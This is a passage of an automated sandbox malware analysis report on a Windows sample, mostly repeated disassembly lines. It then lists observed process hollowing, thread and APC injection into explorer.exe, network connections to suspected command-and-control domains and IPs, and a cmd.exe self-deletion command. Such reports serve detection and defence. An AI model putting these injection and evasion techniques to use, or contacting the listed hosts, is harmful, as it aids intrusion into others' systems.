          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0495B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0495B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0495B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0495B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04960050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04960050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049DC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049DC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A02073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A11074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0496746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04972990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A105AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04A105AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0496C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04972581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04972581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04972581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04972581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04942D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04942D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04942D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04942D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04942D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04971DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04971DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04971DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049735A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049761A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049761A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049C69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049C6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049F8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0494B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0494B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0494B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049D41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0495D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0495D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04949100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04949100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04949100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04A18D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0494AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049CA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04974D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04974D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04974D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0497513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0497513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04964120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04964120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04964120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04964120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04964120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04967D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0496B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0496B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04983D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049C3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0496C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0496C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0494B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0494B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0494C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0497D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0497D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04A10EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04A10EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04A10EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049DFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0495AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0495AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0497FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049C46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049736CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04972ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049FFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04988EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04972AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049716E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04A18ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049576E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0494AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0494AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04945210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04945210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04945210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04945210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04963A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0497A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0497A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0494C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0494C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0494C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04978E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04958A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049FFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04A01608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0494E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04984A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04984A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04A18A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049D4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04949240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04949240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04949240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04949240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04957E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04957E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04957E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04957E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04957E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04957E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0498927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0496AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0496AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0496AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0496AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0496AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0495766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049FB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049FB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04972397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04958794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04A15BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0497B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049C7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049C7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049C7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04951B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04951B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049FD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04A0138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04974BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04974BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04974BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049C53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049C53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049837F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049703E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0496DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0496F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049DFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049DFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0497A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0497A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0497E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04A1070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04A1070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04944F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04944F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04A0131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04A18F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0494F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0494DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0495EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04973B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04973B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0494DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0495FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04A18B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Network Connect: 52.128.23.153 80
          Source: C:\Windows\explorer.exe | Network Connect: 202.210.8.86 80
          Source: C:\Windows\explorer.exe | Domain query: www.omfgphil.com
          Source: C:\Windows\explorer.exe | Network Connect: 156.252.96.189 80
          Source: C:\Windows\explorer.exe | Domain query: www.tracisolomon.xyz
          Source: C:\Windows\explorer.exe | Network Connect: 34.95.69.141 80
          Source: C:\Windows\explorer.exe | Network Connect: 81.169.145.162 80
          Source: C:\Windows\explorer.exe | Network Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exe | Domain query: www.rogegalmish.com
          Source: C:\Windows\explorer.exe | Domain query: www.webdomoupravitel.com
          Source: C:\Windows\explorer.exe | Domain query: www.drisu-goalkeeping.com
          Source: C:\Windows\explorer.exe | Network Connect: 192.232.222.43 80
          Source: C:\Windows\explorer.exe | Domain query: www.shirleyeluiz.com
          Source: C:\Windows\explorer.exe | Domain query: www.thepocket-onlinelesson.xyz
          Source: C:\Windows\explorer.exe | Network Connect: 64.98.145.30 80
          Source: C:\Windows\explorer.exe | Domain query: www.4520oceanviewavenue.com
          Source: C:\Windows\explorer.exe | Domain query: www.skynetaccess.com
          Source: C:\Windows\explorer.exe | Domain query: www.best-cleaner.com
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Memory written: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Thread register set: target process: 3388
          Source: C:\Windows\SysWOW64\rundll32.exe | Thread register set: target process: 3388
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 1340000
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Process created: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe C:\Users\user\Desktop\457b22da_by_Libranalysis.exe
          Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\457b22da_by_Libranalysis.exe'
          Source: explorer.exe, 00000005.00000002.480271164.0000000001398000.00000004.00000020.sdmp | Binary or memory string: ProgmanamF
          Source: explorer.exe, 00000005.00000000.241521742.0000000001980000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.483140519.0000000003360000.00000002.00000001.sdmp | Binary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.241521742.0000000001980000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.483140519.0000000003360000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.241521742.0000000001980000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.483140519.0000000003360000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.241521742.0000000001980000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.483140519.0000000003360000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Queries volume information: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe VolumeInformation
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
